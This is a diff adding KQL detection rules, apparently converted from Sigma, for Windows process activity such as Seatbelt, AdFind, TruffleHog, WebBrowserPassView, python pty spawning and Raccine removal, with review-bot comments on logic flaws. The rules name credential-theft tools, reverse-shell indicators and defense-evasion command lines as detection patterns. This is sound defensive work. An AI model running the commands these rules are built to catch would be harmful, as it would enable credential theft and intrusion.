+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
new file mode 100644
index 00000000..bff4da4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
@@ -0,0 +1,13 @@
+// Title: PUA - SoftPerfect Netscan Execution
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
+// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
new file mode 100644
index 00000000..469e6605
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
@@ -0,0 +1,12 @@ +// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +// Author: frack113 +// Date: 2021-12-13 +// Level: high +// Description: Detects active directory enumeration activity using known AdFind CLI flags +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002 +// False Positives: +// - Authorized administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/pua_system_informer_execution.kql b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql new file mode 100644 index 00000000..d2f4d415 --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql 
@@ -0,0 +1,12 @@ +// Title: PUA - System Informer Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-08 +// Level: medium +// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543 +// False Positives: +// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly + +DeviceProcessEvents +| where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql new file mode 100644 index 00000000..f5495cb2 --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql 
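Review bot: The hash clauses in the `where` line use `startswith` against full 32/40/64-character digests (`MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC"`), which reads as a prefix match on a value that can only ever be equal or not; `MD5 =~ "19426363A37C03C3ED6FEDF57B6696EC"` (and likewise `SHA1 =~` / `SHA256 =~`) states the intent and cannot be widened by a truncated constant. The three hashes pin a single System Informer build, so they add little over the `FolderPath`/`OriginalFileName`/`FileDescription` clauses and will silently stop matching on the next release; a comment such as `// hashes cover one release only; the name/description clauses carry the detection` would save the next maintainer a check. Whether the upstream Sigma `Hashes|contains` was meant as prefix or equality cannot be told from this hunk, so confirm before changing the operator.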
@@ -0,0 +1,14 @@ +// Title: PUA - TruffleHog Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: medium +// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. +// While it is a legitimate tool, intended for use in CI pipelines and security assessments, +// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 +// False Positives: +// - Legitimate use of TruffleHog by security teams or developers. + +DeviceProcessEvents +| where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql new file mode 100644 index 00000000..24861905 --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql 
@@ -0,0 +1,12 @@ +// Title: PUA - WebBrowserPassView Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: medium +// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql new file mode 100644 index 00000000..bbdbff02 --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - Wsudo Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-02 +// Level: high +// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file 
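Review bot: In the Wsudo hunk the command-line group and the image group are joined with `or`, so any process whose command line contains `-u System`, `-uSystem`, `-u TrustedInstaller` or ` --ti ` fires this `high` rule with no wsudo indicator at all, and those strings are generic enough to appear in unrelated tooling. The "Suspicious Execution" title and the pairing of a flag group with an image group suggest the upstream condition is `all of selection_*`, in which case the join should read `) and (FolderPath endswith "\\wsudo.exe" or ...`; if upstream really is `1 of`, the file needs a False Positives section (it currently has none) explaining the expected noise. Worth checking against the Sigma source before this lands.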
diff --git a/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql new file mode 100644 index 00000000..24b411db --- /dev/null +++ b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql @@ -0,0 +1,10 @@ +// Title: Pubprn.vbs Proxy Execution +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql new file mode 100644 index 00000000..11d7136c --- /dev/null +++ b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql @@ -0,0 +1,11 @@ +// Title: Python Function Execution Security Warning Disabled In Excel +// Author: @Kostastsale +// Date: 2023-08-22 +// Level: high +// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. +// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/python_inline_command_execution.kql b/KQL/rules/windows/process_creation/python_inline_command_execution.kql
new file mode 100644
index 00000000..f8f4b4ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/python_inline_command_execution.kql
@@ -0,0 +1,12 @@ +// Title: Python Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Python libraries that use a flag starting with "-c". Filter according to your environment + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "" and ProcessCommandLine contains "exec(compile(") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe")))))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql new file mode 100644 index 00000000..a156ddbb --- /dev/null 
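Review bot: The second exclusion contains `ProcessCommandLine contains ""`, which is a conversion artifact: an empty search term either matches every row or none, and in neither case does it express whatever second pattern the upstream filter paired with `exec(compile(`. If it evaluates true, the exclusion collapses to `ProcessCommandLine contains "exec(compile("` and suppresses any `python -c` invocation that uses `exec(compile(...))`, a common stager shape this rule exists to catch; if it evaluates false, the exclusion is dead code. The lost pattern should be recovered from the Sigma rule, and the converter should refuse to emit an empty string term rather than silently producing one. Separately, `FolderPath endswith "python.exe"` without a leading backslash also matches any `*python.exe` binary (e.g. `ipython.exe`), which may or may not be intended.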
+++ b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql
@@ -0,0 +1,10 @@
+// Title: Python Spawning Pretty TTY on Windows
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: high
+// Description: Detects python spawning a pretty tty
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
new file mode 100644
index 00000000..fff4c787
--- /dev/null
+++ b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
@@ -0,0 +1,10 @@
+// Title: Query Usage To Exfil Data
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/quickassist_execution.kql b/KQL/rules/windows/process_creation/quickassist_execution.kql
new file mode 100644
index 00000000..d775ccb6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/quickassist_execution.kql
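Review bot: In the Query Usage hunk, `ProcessCommandLine contains "session >"` on the `query.exe` process will rarely match, because the `>` redirection is consumed by the parent shell and the child `query.exe` is started with only `query session`; the redirect text is visible in the parent's command line, not the child's. The Recon Information for Export rule later in this diff handles exactly this by checking `InitiatingProcessCommandLine`, and this rule should do the same, e.g. `| where FolderPath endswith ":\\Windows\\System32\\query.exe" and (InitiatingProcessCommandLine contains "session >" or InitiatingProcessCommandLine contains "process >")`. As written the upstream Sigma logic is preserved but the detection is effectively dead on process-creation telemetry; a quick `cmd /c query session > %TEMP%\s.txt` test would confirm it.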
@@ -0,0 +1,12 @@
+// Title: QuickAssist Execution
+// Author: Muhammad Faisal (@faisalusuf)
+// Date: 2024-12-19
+// Level: low
+// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use of Quick Assist in the environment.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QuickAssist.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/raccine_uninstall.kql b/KQL/rules/windows/process_creation/raccine_uninstall.kql
new file mode 100644
index 00000000..5819e516
--- /dev/null
+++ b/KQL/rules/windows/process_creation/raccine_uninstall.kql
@@ -0,0 +1,12 @@
+// Title: Raccine Uninstall
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-21
+// Level: high
+// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate deinstallation by administrative staff
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
new file mode 100644
index 00000000..1a9de391
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
@@ -0,0 +1,13 @@ +// Title: Rar Usage with Password and Compression Level +// Author: @ROxPinTeddy +// Date: 2020-05-12 +// Level: high +// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of Winrar command line version +// - Other command line tools, that use these flags + +DeviceProcessEvents +| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql new file mode 100644 index 00000000..52f9dc57 --- /dev/null +++ b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: RDP Connection Allowed Via Netsh.EXE +// Author: Sander Wiebing +// Date: 2020-05-23 +// Level: high +// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql new file mode 100644 index 00000000..52185e31 --- /dev/null +++ b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql @@ -0,0 +1,15 @@ +// Title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class +// Author: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-15 +// Level: medium +// Description: Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell. +// In PowerShell one-liner commands, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP. +// In WMIC, the "rdtoggle" alias or "Win32_TerminalServiceSetting" class may be used for the same purpose. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, attack.execution, attack.t1047 +// False Positives: +// - Legitimate system administrators enabling RDP for remote support +// - System configuration scripts during deployment + +DeviceProcessEvents +| where (ProcessCommandLine contains "rdtoggle" or ProcessCommandLine contains "Win32_TerminalServiceSetting") and ProcessCommandLine contains "SetAllowTSConnections" and ((FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql new file mode 100644 index 00000000..f4985f03 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: RDP Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-01-29 +// Level: high +// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql new file mode 100644 index 00000000..f0a44140 --- /dev/null +++ b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql @@ -0,0 +1,10 @@ +// Title: Read Contents From Stdin Via Cmd.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-07 +// Level: medium +// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql new file mode 100644 index 00000000..bfc0adbc --- /dev/null 
+++ b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql @@ -0,0 +1,12 @@ +// Title: Rebuild Performance Counter Values Via Lodctr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-15 +// Level: medium +// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage by an administrator + +DeviceProcessEvents +| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql new file mode 100644 index 00000000..5ddcf479 --- /dev/null +++ b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql 
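Review bot: The image clause is `FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE"`, while every other rule in this diff joins the path and OriginalFileName checks with `or` (see the netsh and reg.exe rules). With `and`, a renamed copy of lodctr.exe (OriginalFileName preserved, path different) and any event where the version-info field is unpopulated are both missed, which defeats the reason for checking OriginalFileName at all. Unless the upstream Sigma selection is written as a map rather than a list, this should be `(FolderPath endswith "\\lodctr.exe" or ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE")`. The windash expansion (`–r`, `—r`, `―r`) is correctly carried over.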
@@ -0,0 +1,11 @@ +// Title: Recon Command Output Piped To Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-07-06 +// Level: medium +// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. +// Attackers often time use this technique to extract specific information they require in their reconnaissance phase. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql new file mode 100644 index 00000000..632091d5 --- /dev/null +++ b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql 
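Review bot: The description says this rule targets inline `cmd.exe /c` or `/k` calls, but the `where` line has no image constraint, and the `net` branch is `ProcessCommandLine contains "net"`, so any process whose command line contains `net` (`.NET`, `dotnet`, `netsh`, `internet`), a `|` and `find` trips it. Switching the recon tokens to term matching (`ProcessCommandLine has "net"`, and likewise for the other six) removes most substring hits while keeping `net user | findstr`, and adding `(FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")` would make the query match the stated scope; if upstream is intentionally shell-agnostic, the description should say so instead. The lone xampp exclusion suggests the broad match was already noisy upstream.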
@@ -0,0 +1,10 @@ +// Title: Recon Information for Export with Command Prompt +// Author: frack113 +// Date: 2021-07-30 +// Level: medium +// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1119 + +DeviceProcessEvents +| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql new file mode 100644 index 00000000..c7a12c29 --- /dev/null +++ b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql 
@@ -0,0 +1,12 @@ +// Title: Reg Add Suspicious Paths +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: high +// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001 +// False Positives: +// - Rare legitimate add to registry via cli (to these locations) + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql new file mode 100644 index 00000000..63ca896d --- /dev/null +++ b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql 
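Review bot: Despite the title "Reg Add" and the description "add or modify", the `where` line checks only the registry paths and the reg.exe image and never a verb, so `reg query` or `reg export` against `\Microsoft\Windows Defender\` or the `Winlogon` keys — routine administration as well as common recon — raise a `high` alert. If the intent really is add/modify, a verb clause such as `and (ProcessCommandLine has "add" or ProcessCommandLine has "import")` belongs here; if upstream deliberately omits it, the description and False Positives section should state that read-only access also fires. Either way the current header promises narrower behaviour than the query delivers.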
@@ -0,0 +1,13 @@ +// Title: RegAsm.EXE Execution Without CommandLine Flags or Files +// Author: frack113 +// Date: 2025-06-04 +// Level: low +// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity. +// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 +// False Positives: +// - Legitimate use of Regasm by developers. + +DeviceProcessEvents +| where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql new file mode 100644 index 00000000..1b2076fa --- /dev/null +++ 